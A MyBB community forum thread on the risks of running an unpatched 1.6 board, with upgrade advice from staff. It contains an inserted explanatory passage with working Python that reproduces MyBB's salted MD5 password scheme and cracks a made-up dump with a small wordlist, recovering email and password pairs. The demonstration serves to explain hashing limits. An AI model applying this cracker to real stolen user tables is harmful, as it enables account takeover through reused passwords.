MyBB Community Forums

Full Version: Looking for a staff member or developer answer on a security debate
There's a large forum I know of that hasn't moved to 1.8 and when asked why, they get defensive and angry, and insist there's nothing to worry about.  Some of my friends have had bad experiences and we're trying to get an official answer on just how dangerous a forum is that was never updated to 1.8?  What motivation could there be for not updating and could it be malicious?
The most common reason owners of large forums don't upgrade is because they have too many modifications or custom code that they don't want to/don't know how to update for 1.8. Or, they just don't know how to do the upgrade or are scared of doing it.

In terms of whether it's dangerous, if they've manually been applying security fixes that affect code from 1.6 as well as 1.8 then that would be good, but if it's an unpatched version of 1.6 then it wouldn't be advisable.

I highly doubt it'd be "malicious", because it'd be the forum that got hacked, not you specifically. Ultimately it's the forum owner's responsibility to make sure the software is up to date, the same way as the software on your computer or phone.
They definitely wouldn't know how to manually apply fixes based on everything I've seen from them for years.

If somebody who was using the same PW in that forum that they use for the email account they signed up with, and that email got hacked, is there a good possibility it's the forum that allowed it? Can an unpatched 1.6 let an attacker get PWs and emails they can try to log in to the email accounts with? That's one of the topics going around but hasn't been proven yet.
Quote: If somebody who was using the same PW in that forum that they use for the email account they signed up with, and that email got hacked

It doesn't count as getting hacked if you give your password to everyone you meet (by signing up everywhere with the same password). There is no way to fix this in software, other than forcing you to use unique passwords anyway, which is what two-factor authentication essentially does.
Good point. But that could be where they got it right? Without putting the blame on the users that used the same PW thinking it was secure like the owner said it was.

I'd like to present this to that owner and get him to realize there's a problem. On a scale of 0 - 10, how likely would you or any staff/developer say it is that an old 1.6 forum is letting attackers gain email & pw combinations to try logging into email accounts with? That owner tells us it's basically a 0 and I'm pretty sure he's lying or maybe just really doesn't know better, which is why this would help to get a really clear answer on. I want it to be that there's no way for him to deny knowing these risks anymore.
(2021-03-14, 08:17 PM) Der Meister Wrote: If somebody who was using the same PW in that forum that they use for the email account they signed up with, and that email got hacked, is there a good possibility it's the forum that allowed it? Can an unpatched 1.6 let an attacker get PWs and emails they can try to log in to the email accounts with? That's one of the topics going around but hasn't been proven yet.

I wouldn't go so far as saying that would definitely be how it got hacked as there'd be no way to prove that. The passwords are hashed so can't be retrieved, but there's no way of knowing if any patched SQL or XSS vulnerabilities have been exploited on an unpatched board.

(2021-03-14, 08:51 PM) Der Meister Wrote: I'd like to present this to that owner and get him to realize there's a problem. On a scale of 0 - 10, how likely would you or any staff/developer say it is that an old 1.6 forum is letting attackers gain email & pw combinations to try logging into email accounts with? That owner tells us it's basically a 0 and I'm pretty sure he's lying or maybe just really doesn't know better, which is why this would help to get a really clear answer on. I want it to be that there's no way for him to deny knowing these risks anymore.

Again, I don't think you could really definitively connect those events. Unless a shell script has been uploaded to log plaintext passwords, it wouldn't be easy to get plaintext passwords even if you had access to the database itself.

They definitely need to upgrade regardless though because otherwise the forum may just end up getting hacked.
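The post above says stored passwords are hashed and cannot simply be read out of the database. To show what "hashed" does and does not protect, here is an added example, written for this thread rather than taken from it or from MyBB's own code. It reproduces the salted scheme MyBB 1.x stores in mybb_users.password (md5(md5(salt) . md5(password)), used by both 1.6 and 1.8), builds a constructed dump of three hypothetical accounts, and runs a small offline dictionary attack against it. The usernames, e-mail addresses, passwords and wordlist are all made up here; the salts are generated when the script runs.

```python
import hashlib
import hmac
import secrets
import string


def md5_hex(data: str) -> str:
    """Hex MD5 of a UTF-8 string (MyBB stores hashes as 32-char hex)."""
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def mybb_password_hash(password: str, salt: str) -> str:
    """MyBB 1.x scheme: md5(md5(salt) . md5(password))."""
    return md5_hex(md5_hex(salt) + md5_hex(password))


def make_salt(length: int = 8) -> str:
    """Per-user random salt; MyBB uses an 8-character alphanumeric salt."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def verify_login(password: str, row: dict) -> bool:
    """What the board does at login: rehash with the stored salt and compare.
    A constant-time comparison avoids leaking hash prefixes via timing."""
    candidate = mybb_password_hash(password, row["salt"])
    return hmac.compare_digest(candidate, row["password"])


# Constructed sample accounts standing in for rows of a dumped mybb_users
# table. Names, e-mails and passwords are hypothetical.
SAMPLE_ACCOUNTS = [
    ("alice", "alice@example.com", "summer2021"),
    ("bob", "bob@example.com", "nP7#vQ2mLx!9"),
    ("carol", "carol@example.com", "correct horse battery staple"),
]


def build_sample_dump() -> list:
    """Turn the constructed accounts into rows as they would sit in the DB."""
    rows = []
    for username, email, password in SAMPLE_ACCOUNTS:
        salt = make_salt()
        rows.append({
            "username": username,
            "email": email,
            "salt": salt,
            "password": mybb_password_hash(password, salt),
        })
    return rows


# Constructed wordlist: a handful of entries of the kind found in any
# leaked-password list. Only alice's password is in it.
WORDLIST = ["123456", "password", "qwerty", "summer2021", "letmein", "welcome1"]


def dictionary_attack(rows: list, wordlist: list) -> dict:
    """Offline guessing against dumped rows. The per-user salt stops a single
    guess from being checked against every user at once, but MD5 is cheap, so
    each guess is simply re-hashed per user. Returns {email: password}, which is
    exactly the pair an attacker then tries against the victim's mail provider."""
    recovered = {}
    for row in rows:
        for guess in wordlist:
            if mybb_password_hash(guess, row["salt"]) == row["password"]:
                recovered[row["email"]] = guess
                break
    return recovered


if __name__ == "__main__":
    dump = build_sample_dump()
    hits = dictionary_attack(dump, WORDLIST)
    for email, pw in hits.items():
        print(f"recovered {email} -> {pw!r}")
    print(f"{len(hits)} of {len(dump)} accounts fell to a {len(WORDLIST)}-word list")
```

Running it recovers alice's e-mail and password from a six-word list and nothing for bob or carol: the hashing protects exactly the accounts whose passwords are not in a wordlist. A dedicated cracking rig tries salted MD5 guesses at billions per second, so a dumped table from an unpatched board turns every weak, reused password into a working e-mail login, which is the scenario the thread is asking about.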
Ok thanks guys; I think this will help.
Ultimately it comes down to the security of the entire board more than an individual user. If the forum gets hacked by an SQL injection, or someone's cookie gets stolen by an XSS attack, then that's everyone's problem. If it's true that patches haven't been applied manually, then there'll be several known vulnerabilities that could be exploited.

I can understand hesitance to upgrade if there are lots of custom changes, such as code changes, plugins, or a custom theme, but they should be able to be upgraded without too much trouble. If it's fear of it going wrong, taking backups and doing trial runs first mean the process is completely safe.

Routine maintenance and software updates come part and parcel with running a website, the same as you having to update WordPress and any other software - leaving it on an old version will only end in tears when someone exploits a vulnerability we fixed 5 years ago and causes mass data loss.